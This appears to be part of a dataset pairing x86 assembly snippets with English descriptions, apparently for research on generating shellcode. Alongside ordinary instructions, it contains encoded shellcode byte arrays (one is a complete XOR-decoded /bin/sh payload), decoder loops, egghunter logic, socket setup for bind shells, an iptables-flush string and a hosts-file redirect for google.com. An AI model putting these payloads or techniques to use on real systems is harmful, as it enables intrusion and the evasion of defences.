834decode: define the decode label
835decode: function decode
836decode: decode function
837decode: decode routine
838decode: decode label
839decode: \n cmp byte [esi], 0x7 \n jl lowbound \n sub byte [esi], 0x7 \n jmp common_commands in the decode function jump to lowbound label if the current byte of the shellcode is lower than 0x7 else subtract 0x7 from the byte of the shellcode and jump to common_commands
840decode: \n mov bl, byte [esi] in decode move the current byte of the shellcode in the bl register
841decode: \n not byte [esi] define the decode function and negate the byte in esi
842decode: \n sub byte [esi], 13 define decode function and subtract 13 from the current byte of the shellcode
843decode: \n xor byte [esi], 0xaa define the decode function and perform the xor operation between the byte in esi and the 0xaa value
844decoded_shellcode: define _decoded_shellcode label
845decoded_shellcode: define decoded_shellcode function
846decoded_shellcode: \n call [esp] declare the decoded_shellcode label and call the stack
847decoder_setup: decoder_setup label
848decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d define decoder_value as an array of the following bytes: 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
849decoder: declare decoder label
850decoder: declare _decoder label
851decoder: declare _decoderf label
852decoder: define decoder label
853decoder: define decoder_label
854decoder: define _decoder label
855decoder: define _ decoder label
856decoder: define the decoder function
857decoder: decoder function
858decoder: decoder routine
859decoder: declare the label decoder
860decoder: define decoder
861decoder: decoder's main
862decoder: decoder label
863decoder: declare the decoder function
864decoder: define decoder function
865decoder: declare the decoder label
866decoder: \n pop esi define the decoder function and store the encoded shellcode pointer in the esi register
867decoder: \n pop esi in the decoder routine save the shellcode in esi
868decoder: \n pop esi \n mov edi, esi in decoder save the shellcode in esi and move it to edi
869decoder1: define decoder1_label
870decoder2: declare decoder2_label
871decrypt: define _decrypt label
872decrypt: declare the decrypt label
873dim: equ 25 declare a constant size and set equal to 25
874dim: equ 512 define dim to be 512 bytes large
875div dword [value] divide the contents of eax by the word value stored at memory location value
876div dword [var] divide the contents of in eax by by the word value stored at memory location var
877div dword ptr [eax] divide dx:ax by the double word in eax storing in ax the quotient and in dx the reminder
878div ebx divide eax by ebx
879div ebx divide the contents of eax by the contents of ebx
880div ecx divide eax by ecx
881div ecx divide eax by ecx the result of the division is stored in eax and the remainder in edx
882div edx divide eax by value in edx
883div esi divide eax by esi
884do_dup: declare the do_dup label
885do_dup: define do_dup label
886doit: declare the doit label
887done: define _done label
888done: declare the done label
889download: delcare download_label
890download: declare the download label
891download: define download function
892dup2: declare _dup label
893dup2: declare _dup2 label
894dup2: define dup2 label
895dup2: define _dup2 label
896dup2: declare the dup2 label
897dup2: define dup2 function
898dup2loop: declare _dup2loop label
899dup2loop: delcare the dup2loop label
900dupcount: declare _dopcount label
901dupcpunt: declare _dupcount label
902duploop: define duploop_label
903duploop: declare the duploop label
904duploop: define duploop function
905egg equ 'egg ' define egg equal to 'egg '
906egg1 equ 'mark' define egg1 equal to 'mark'
907egghunter: define _egghunter label
908egghunter: declare the egghunter label
909enc: define enc_label
910enc: declare the enc label
911enc: \n call decoder define enc function and call decoder
912encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80 encoded_shellcode is an array of bytes 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80
913encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539 define encoded_shellcode as array of words 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
914encoded: define _encoded label
915encoded: db 0xaa,0x62,0xc0,0xaa,0xa0,0xaa,0xd0,0xaa,0x5e,0xaa,0x5e,0xaa,0xe6,0xaa,0xd0,0xaa,0xd0,0xaa,0x5e,0xaa,0xc4,0xaa,0xd2,0xaa,0xdc,0x89,0xe3,0xaa,0xa0,0x89,0xe2,0xaa,0xa6,0x89,0xe1,0xb0,0xaa,0x16,0xcd,0x80,0xbb encoded is the array of bytes 0xaa,0x62,0xc0,0xaa,0xa0,0xaa,0xd0,0xaa,0x5e,0xaa,0x5e,0xaa,0xe6,0xaa,0xd0,0xaa,0xd0,0xaa,0x5e,0xaa,0xc4,0xaa,0xd2,0xaa,0xdc,0x89,0xe3,0xaa,0xa0,0x89,0xe2,0xaa,0xa6,0x89,0xe1,0xb0,0xaa,0x16,0xcd,0x80,0xbb
916encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539 define encoded as array of words 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539
917encodedshellcode: define encodedshellcode_label
918encodedshellcode: db \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb define the array of bytes encodedshellcode and initialize to \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb
919encodedshellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce define the array of bytes encodedshellcode and initialize it to 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
920encodedshellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce define the array of bytes encodedshellcode and initialize to 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
921encodedshellcode: db 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe encodedshellcode is the array of bytes 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe
922encodedshellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd declare _encodedshellcode label and the encoded shellcode: 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd
923encodedshellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3 define _encodedshellcode label declare db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
924encodedshellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3 define the array of bytes encodedshellcode and initialize it to 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
925encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87 define the array of bytes encodedshellcode and initialize it to 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87
926encodedshellcode: db 0xeb,0x0c,0x5e,0x31,0xc9,0xb1,0x19,0xf6,0x16,0x46,0xe2,0xfb,0xeb,0x05,0xe8,0xef,0xff,0xff,0xff,0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f define the array of bytes encodedshellcode and initialize it to 0xeb,0x0c,0x5e,0x31,0xc9,0xb1,0x19,0xf6,0x16,0x46,0xe2,0xfb,0xeb,0x05,0xe8,0xef,0xff,0xff,0xff,0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f
927encoder_shellcode: db 0x08,0x60,0x58,0xc8,0x39,0xb0,0xd8,0xc3,0x9f,0x9f,0xd1,0xb8,0xb3,0xfe,0xb9,0x1e,0x4e,0xfd,0x97,0x70,0x39,0xb0,0x6a,0xdb,0xb0,0xc4,0x09,0xcf,0x74,0x25,0x76,0xe6,0xe6,0xe6,0xf6,0x90,0x90,0xaa,0xaa encoder_shellcode is the array of bytes 0x08,0x60,0x58,0xc8,0x39,0xb0,0xd8,0xc3,0x9f,0x9f,0xd1,0xb8,0xb3,0xfe,0xb9,0x1e,0x4e,0xfd,0x97,0x70,0x39,0xb0,0x6a,0xdb,0xb0,0xc4,0x09,0xcf,0x74,0x25,0x76,0xe6,0xe6,0xe6,0xf6,0x90,0x90,0xaa,0xaa
928encrypt: define _encrypt label
929encrypt: declare the encrypt label
930end: define _end label
931end: declare the end label
932entrypoint: define _entrypoint label
933entrypoint: declare the entrypoint label
934even_number: define even_number label
935even_number: define even_number
936even_number: define even_number function
937execfile: declare _execfile label
938execfile: define execfile function
939execfile: declare the execfile label
940execute_shellcode: \n jmp short esp in execute_shellcode jump short to esp
941execute: define _execute label
942execute: declare the execute label
943exit_call equ 1 define exit_call =1
944exit_call equ 1 define exit_call equal to 1
945exit_on_error: define exit_on_error label
946exit_on_error: declare the exit_on_error label
947exit: define exit_label
948exit: define _exit label
949exit: define exit function
950exit: define the exit label
951exit: declare the exit label
952F1: \n call function_1 define F1 and call the function function_1
953F1: \n cmp byte [esi], 0x1 \n jl L1 \n sub byte [esi], 0x1 \n jmp L2 in the function F1 jump to label L1 if the current byte of the shellcode is lower than 0x1 else subtract 0x1 from the byte of the shellcode and jump to L2
954F1: \n inc esi in the function F1 point to the next byte in esi
955F1: \n inc esi \n inc esi in the function F1 point to the next word in esi
956F1: \n jmp short L1 define F1 function and jump short to L1
957F1: \n not cl \n inc cl in the function F1 negate cl and increment cl to the next byte
958F1: \n not cl \n inc cl define F1, negate cl and increment cl to the next byte
959F1: \n not cl \n inc cl define F1, negate cl and point to the next byte in the cl register
960F1: \n pop esi define the function F1 and store the encoded shellcode pointer in the esi register
961F1: \n pop esi declare the function F1 and save in esi the pointer to the shellcode
962F1: \n pop esi declare the function F1 and point the shellcode in esi
963F1: inc edi \n jmp short L1 in the function F1 point to the next byte of the edi and jump short to L1
964F2: \n call function_1 define F2 and call the function function_2
965F2: \n cmp byte [esi], 0x2 \n jg L1 \n add byte [esi], 0x2 \n jmp L2 in the function F2 jump to label L1 if the current byte of the shellcode is greater than 0x2 else add 0x2 to the byte of the shellcode and jump to L2
966F2: \n inc esi declare F2 and point to the next byte in esi
967F2: \n inc esi \n inc esi declare F2 and point to the next word in esi
968F2: \n jmp L3 define F2 function and jump to L3
969F2: \n not bl \n inc bl in the function F2 negate bl and move bl to the next byte
970F2: \n not bl \n inc bl declare F2, negate bl and move bl to the next byte
971F2: \n not bl \n inc bl declare F2, negate bl and point to the next byte in bl
972F2: inc eax \n jmp L1 in F2 point to the next byte of the eax register and jump to label L2
973F3: \n call function_1 define F3 and call the function function_3
974F3: \n cmp byte [esi], 0x3 \n je L1 \n mov byte [esi], 0x3 \n jmp L2 in the routine F3 jump to label L1 if the current byte of the shellcode is equal to 0x3 else move 0x3 into the byte in esi and jump to L2
975F3: \n inc edi declare F3 function and point to the next byte in edi
976F3: \n inc edi \n edi declare F3 function and point to the next word in edi
977F3: \n jmp L5 define F3 and jump to L5
978F3: \n not al \n inc al in the function F3 negate al and move al to the next byte
979F3: \n not al \n inc al define the function F3, negate al and move al to the next byte
980F3: \n not al \n inc al define the function F3, negate al and point to the next byte in al
981F3: inc ebx \n jmp short L2 define the function F3, move to the next byte of ebx and jump short to L2
982F4: \n call function_1 define F4 and call the function function_4
983F4: \n cmp byte [esi], 0x1 \n jl L1 \n sub byte [esi], 0x1 \n jmp L2 in the function F4 jump to label L1 if the byte specified by the address in esi is lower than 0x1 else subtract 0x1 from the byte at the address in esi and jump to L2
984F4: \n jmp short L5 declare F4 and jump short to F5
985F4: \n not dl \n inc dl in the function F4 negate dl and point to the next byte in the dl register
986F4: \n not dl \n inc dl declare the function F4, negate dl and move dl to the next byte
987F4: inc ecx \n jmp L2 declare F4, move to the next byte in ecx and jump to L2
988F5: \n call function_1 define F5 and call the function function_5
989F5: \n cmp byte [esi], 0x2 \n jg L1 \n add byte [esi], 0x2 \n jmp L2 in the function F5 jump to label L1 if the byte at the address in esi is greater than 0x2 else add 0x2 to the byte at the address in esi and jump to L2
990F5: \n jmp L1 declare F5 and jump to L1
991F5: inc edx \n jmp short L3 define the function F5, increment edx and jump short to L3
992F6: \n cmp byte [esi], 0x3 \n je L1 \n mov byte [esi], 0x3 \n jmp L2 in the routine F6 jump to label L1 if the byte at the address specified by esi is equal to 0x3 else move 0x3 into the byte in esi and jump to L2
993file: db '/sbin/iptables#-f' define file as the byte string '/sbin/iptables#-f'
994fileaddress: define _fileaddress label
995fileaddress: declare the fileaddress label
996filecontents: resb 128 reserve filecontents variable of 128 bytes
997filename: db 'readme.txt', 0h create a string filename and initialize to 'readme.txt'
998filename: resb 255 reserve a variable filename of 255 bytes
999filestoread: define filestoread_label
1000fill: declare the fill label
1001fill: define fill label
1002find_address: define find_address label
1003find_egg: define find_egg label
1004find_egg: declare the find_egg label
1005find_egg: define find_egg function
1006fldpi push pi onto the fpu stack
1007fldz \n fstenv [esp-0xc] \n pop edi obtain the address of the first instruction of the shellcode
1008format: define format label
1009format: define format routine
1010format: declare the format label
1011formatting: define formatting label
1012formatting: formatting label
1013formatting: declare the formatting label
1014four: define _four label
1015four: declare the four label
1016fstenv [esp-0xc] \n pop esi obtain the address of the first instruction of the shellcode alias the entry mem addr of this code (_start) and then pop it in esi
1017function_1: \n call [esp] define function_1 and execute it
1018function_2: \n call [esp] declare function_2 and execute it
1019function_3: \n call [esp] declare function_3 and call it
1020function_4: \n call [esp] define function_4 and call it
1021function_5: \n call [esp] define function_5 and execute it
1022fupdisasm: define fupdisasm function
1023fupdisasm: define fupdisasm label
1024fwait put cpu into a wait state until the coprocessor signals it has finished itÕs operation
1025get_key: define _get_key label
1026get_shellcode_addr: get_shellcode_addr function
1027get: declare get_label
1028get: declare the get label
1029global _shell declare _shell as global label
1030global _start declare global start
1031global _start define global _start
1032global _start declare global _start, section .text, _start label
1033global _start declare of the global _start
1034global _start global _start
1035global _start define the program entry point
1036global _start declare _start as global label
1037global _start declare global _start
1038global _start \n _start: declare global start and _start label
1039global _start \n _start: declare global _start and _start label
1040global _start \n _start: declare global _start, section .text, _start label
1041global _start \n section .text \n _start: declare global start, section .text and _start label
1042global _start \n section .text \n _start: declare global start, text section and _start label
1043global _start \n section .text \n _start: declare global _start, setion .text, _start
1044global _start \n section .text \n _start: declare global _start, section .text, _start label
1045global _start \n section .text \n _start: declare global _start, section .text and_start label
1046global _start \n section .text \n \n _start: declare global _start, section .text, _start label
1047global _start \n section .text \n egg_sig equ 0x4f904790 \n _start: declare global _start, section .text, egg_sign = 0x4f904790 and_start label
1048global _start \n section .text \n sys_execve equ 0x0b \n _start: declare global _start, section .text, sys_execve = 0x0b and_start label
1049global _start: declare the global _start label
1050global _start: global _start
1051google db '127.1.1.1 google.com' define google as the byte string '127.1.1.1 google.com'
1052google: db '127.1.1.1 google.com' define the byte string google and initialize it to '127.1.1.1 google.com'
1053gotocall: define _gotocall label
1054gotocall: declare the gotocall label
1055hello: db 'hello world!',10 create a string 'hello world!' plus a linefeed character
1056hellolen: equ $-hello define hellolen equal to the length of the hello string
1057here: declare the here label
1058here: define here label
1059hlt halt cpu until reset line is activated
1060in al,0x10 read the hexadecimal value 0x10 and place it in al register
1061inc [count] increment the count variable
1062inc al increment the contents of the al register
1063inc al \n inc al increment al register of 2
1064inc ax add 1 to ax
1065inc ax increment ax
1066inc ax increment the contents of the ax register
1067inc bl increment bl by 1
1068inc bl increment bl register by 1
1069inc bl increment the contents of the bl register
1070inc bl \n inc bl increase bl by 2 so ebx=2
1071inc bx increment bx
1072inc bx increment the contents of the bx register
1073inc byte [esp+ecx] increment the byte at the address [esp+ecx] by one
1074inc cl increase cl of 1
1075inc cl increase cl by 1 so ecx = 1
1076inc cl increment the contents of the cl register
1077inc cl \n cmp cx \n jle dupcount increase cl of 1 until the contents of cx is less than or equal to 2 with sign
1078inc count increment the memory variable count
1079inc cx increment cx by 1
1080inc dl save 0x0a into dl to have bad line feed char
1081inc dl increment dl
1082inc dl increment dl register
1083inc dl increment the contents of the dl register
1084inc dword [tmp] add one to the doubleword integer stored at memory location tmp
1085inc dword [value] add one to the doubleword integer stored at memory location value
1086inc dword [var] add one to the doubleword integer stored at location var
1087inc dx increment the contents of the dx register
1088inc dx increment dx by one
1089inc eax increase eax by 1
1090inc eax increment eax by 1
1091inc eax incement eax register by 1
1092inc eax increase eax content by 1
1093inc eax increment eax content by 1
1094inc eax increment eax
1095inc eax increment the address in eax by one byte
1096inc eax point to the next byte in eax
1097inc eax point to the next byte in the eax register
1098inc eax increment the contents of the eax register
1099inc eax \n cmp dword [eax], ebx \n jne next_addr \n jmp eax go to next memory address increasing eax, then check if the egg is at that memory address. if yes set zf = 1 and go to eax. else zf = 0 and go to next_addr label
1100inc eax \n inc eax point to the next word in the eax register
1101inc eax \n inc eax move to the next word in eax
1102inc eax \n inc eax \n inc eax \n inc eax point to the next double word in eax
1103inc eax \n inc eax \n inc eax \n inc eax move to the next double word in the eax register
1104inc eax \n inc esi \n inc edi increment eax, esi and edi by 1
1105inc eax \n int 0x80 load __nr_exit into eax register and call kernel
1106inc eax \n int 0x80 execute exit syscall
1107inc eax \n int 0x80 execute waitpid syscall
1108inc ebx increment ebx by 1
1109inc ebx increment ebx content by 1
1110inc ebx define sys_socket 1
1111inc ebx increment ebx content defining sys_socket =1
1112inc ebx define sys_socket by increasing ebx by 1
1113inc ebx increment ebx content defining sys_bind = 2
1114inc ebx increment ebx content deining the argument sys_acccept = 5
1115inc ebx increment ebx content then push it on stack
1116inc ebx increment ebx by 1. ebx = sys_socket = 1.
1117inc ebx increment ebx content
1118inc ebx inc-rement ebx by 1
1119inc ebx ebx(5) = sys_accept = accept()
1120inc ebx set connect = 3
1121inc ebx add 1 to ebx
1122inc ebx fix egg signature in ebx adding 1
1123inc ebx load bind =2 into ebx register
1124inc ebx increment ebx register
1125inc ebx increment the contents of the ebx register
1126inc ebx increment ebx
1127inc ebx point to the next byte in the ebx register
1128inc ebx \n inc ebx increment ebx content two times
1129inc ebx \n inc ebx increment ebx two times defining sys_listen = 4
1130inc ebx \n inc ebx point to the next word in the ebx register
1131inc ebx \n inc ebx move to the next word in the ebx register
1132inc ebx \n inc ebx \n inc ebx \n inc ebx point to the next double word in ebx
1133inc ebx \n inc ebx \n inc ebx \n inc ebx move to the next double word in the ebx register
1134inc ebx \n push bx increment ebx content and push it on stack
1135inc ebx \n push ebx increment ebx content and puh it on the stack
1136inc ebx \n push ebx increment ebx content then push it on stack
1137inc ebx \n push ebx push 1 on stack
1138inc ecx go to next address
1139inc ecx increment ecx
1140inc ecx increment ecx content by 1
1141inc ecx increment ecx to 1
1142inc ecx increment ecx by 1
1143inc ecx increment ecx content
1144inc ecx point to the next position in ecx
1145inc ecx point to the next byte in ecx
1146inc ecx next instruction in the ecx register
1147inc ecx increment the contents of the ecx register
1148inc ecx \n inc ecx point to the next word in the ecx
1149inc ecx \n inc ecx move to the next word in the ecx
1150inc ecx \n inc ecx \n inc ecx \n inc ecx point to the next double word in ecx
1151inc ecx \n inc ecx \n inc ecx \n inc ecx move to the next double word in the ecx register
1152inc edi increments edi by 1
1153inc edi increment edi register by 1
1154inc edi increment edi content
1155inc edi increment edi register
1156inc edi inrement edi register
1157inc edi increment the contents of the edi register
1158inc edi point to the next byte in edi
1159inc edi increment edi
1160inc edi \n add al,0x2 increment edi register
1161inc edi \n inc cl increase edi and cl contents of 1
1162inc edx increment edx register by 1
1163inc edx increment edx register
1164inc edx increment edx register by1
1165inc edx increment edx
1166inc edx point to the next byte in edx
1167inc edx point to the next byte in the edx register
1168inc edx increment the contents of the edx register
1169inc edx \n inc edx next word in the edx
1170inc edx \n inc edx \n inc edx \n inc edx point to the next double word in edx
1171inc edx \n inc edx \n inc edx \n inc edx move to the next double word in the edx register
1172inc edx \n inc edx \n inc edx \n inc edx \n inc edx \n inc edx \n inc edx \n inc edx increment edx by 1 for 8 times
1173inc edx \n push edx push sock_stream = 1
1174inc edx \n push edx push af_inet = 2
1175inc edx \n push edx increment edx and push sock_stream = 1 on stack
1176inc edx \n push edx increment edx and push af_inet = 2 on stack
1177inc esi increase esi of 1
1178inc esi increment esi content
1179inc esi incremenet esi content
1180inc esi increment the offset (esi content)
1181inc esi esi point to next istruction in the encoded shellcode
1182inc esi move to the next byte increasing esi by 1
1183inc esi increment esi
1184inc esi point to the next byte in esi
1185inc esi next byte in the encoded shellcode
1186inc esi point to the next byte of the shellcode
1187inc esi move to next byte in esi
1188inc esi point to the next byte of the encoded shellcode
1189inc esi increment to the next byte of the shellcode
1190inc esi increment the contents of the esi register
1191inc esi \n inc edi increment esi and edi register
1192inc esi \n inc esi increment esi content two times
1193inc esi \n inc esi point to the next encoded_shellcode word
1194inc esi \n inc esi point to the next word in esi
1195inc esi \n inc esi point to the next word of the encoded shellcode
1196inc esi \n inc esi point to the next word of the shellcode
1197inc esi \n inc esi next word of the shellcode
1198inc esi \n inc esi move to the next word of the encoded shellcode
1199inc esi \n inc esi move to the next word of the shellcode
1200inc esi \n inc esi \n inc edi increment esi two times and edi once
